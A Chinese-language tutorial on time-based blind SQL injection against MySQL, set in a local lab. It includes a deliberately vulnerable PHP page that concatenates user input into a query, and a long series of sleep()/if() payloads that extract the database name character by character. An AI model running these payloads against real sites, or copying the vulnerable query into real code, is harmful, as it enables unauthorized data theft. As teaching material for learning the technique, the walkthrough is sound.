此文章建立在已经阅读并掌握了《Mysql 联合查询手工注入详解》和Mysql 布尔型盲注手工注入详解的基础上
练习环境与布尔型盲注差不多,php代码改下
<?php
/* 关闭错误信息 */
error_reporting(0);
/* 设置header编码 */
header("Content-type: text/html; charset=utf-8");
/* 连接信息 */
$host = '127.0.0.1';
$user = 'root';
$pass = 'root';
$db = 'test';
if(@isset($_GET['name'])){
$conn = mysqli_connect($host,$user,$pass,$db) or die('Link False');
$sql = "SELECT * FROM user where user='".$_GET['name']."'";
echo '<div style=\'color:red;\'>'.$sql.'</div>';
$res = mysqli_query($conn,$sql);
}else{
echo 'sql-time.php?name=user1';
}
?>
0x00 什么是时间盲注
时间盲注指通过页面执行的时间来判断数据内容的注入方式,通常用于数据(包含逻辑型)不能返回到页面中的场景,无法利用页面回显判断数据内容,只能通过执行的时间来获取数据
0x01 基础知识
这里就比较简单了,介绍一个Mysql中的流程控制
if
if(表达式,真,假)
当表达式成立时,会执行真,反之执行假
example
if
0x01 手工注入
判断注入点
就不多废话了,上payload,具体可参考布尔型盲注的原理
/* 整型注入 */
sql-bool.php?name=user1 and sleep(5)
sql-bool.php?name=user1 and sleep(10)
/* 字符型注入 */
sql-bool.php?name=user1' and sleep(5) and '1'='1
sql-bool.php?name=user1' and sleep(10) and '1'='2
/* 字符型注入 */
sql-bool.php?name=user1" and sleep(5) and "1"="1
sql-bool.php?name=user1" and sleep(10) and "1"="2
这里为了方便看响应时间用burp来发送请求
正常请求
' and sleep(5) and '1'='1
' and sleep(10) and '1'='1
可以看到,正常访问时,页面响应时间为2毫秒,sleep(5)时响应约为5秒,sleep(10)时,约为10秒
由此可判断页面存在时间盲注
读数据
原理大致与布尔型盲注一样,不过由于布尔型无法返回页面,所以通过if来触发sleep()函数,这样就可以通过时间判断表达式的真或假,从而判断数据的内容
sql-time.php?name=user1' and if((select ord(substring(database(),1,1))) = 97,sleep(5),1) and '1'='1
sql-time.php?name=user1' and if((select ord(substring(database(),1,1))) = 98,sleep(5),1) and '1'='1
sql-time.php?name=user1' and if((select ord(substring(database(),1,1))) = 99,sleep(5),1) and '1'='1
sql-time.php?name=user1' and if((select ord(substring(database(),1,1))) = 100,sleep(5),1) and '1'='1
sql-time.php?name=user1' and if((select ord(substring(database(),1,1))) = 101,sleep(5),1) and '1'='1
sql-time.php?name=user1' and if((select ord(substring(database(),1,1))) = 102,sleep(5),1) and '1'='1
sql-time.php?name=user1' and if((select ord(substring(database(),1,1))) = 103,sleep(5),1) and '1'='1
sql-time.php?name=user1' and if((select ord(substring(database(),1,1))) = 104,sleep(5),1) and '1'='1
sql-time.php?name=user1' and if((select ord(substring(database(),1,1))) = 105,sleep(5),1) and '1'='1
sql-time.php?name=user1' and if((select ord(substring(database(),1,1))) = 106,sleep(5),1) and '1'='1
sql-time.php?name=user1' and if((select ord(substring(database(),1,1))) = 107,sleep(5),1) and '1'='1
sql-time.php?name=user1' and if((select ord(substring(database(),1,1))) = 108,sleep(5),1) and '1'='1
sql-time.php?name=user1' and if((select ord(substring(database(),1,1))) = 109,sleep(5),1) and '1'='1
sql-time.php?name=user1' and if((select ord(substring(database(),1,1))) = 110,sleep(5),1) and '1'='1
sql-time.php?name=user1' and if((select ord(substring(database(),1,1))) = 111,sleep(5),1) and '1'='1
sql-time.php?name=user1' and if((select ord(substring(database(),1,1))) = 112,sleep(5),1) and '1'='1
sql-time.php?name=user1' and if((select ord(substring(database(),1,1))) = 113,sleep(5),1) and '1'='1
sql-time.php?name=user1' and if((select ord(substring(database(),1,1))) = 114,sleep(5),1) and '1'='1
sql-time.php?name=user1' and if((select ord(substring(database(),1,1))) = 115,sleep(5),1) and '1'='1
sql-time.php?name=user1' and if((select ord(substring(database(),1,1))) = 116,sleep(5),1) and '1'='1
在其他数值时,页面响应时间约为3毫秒
other
在判断与116是否相等时,页面响应时间约为5秒
116
由此可判断数据库名第一个字符为
t
其他以此类推
网友评论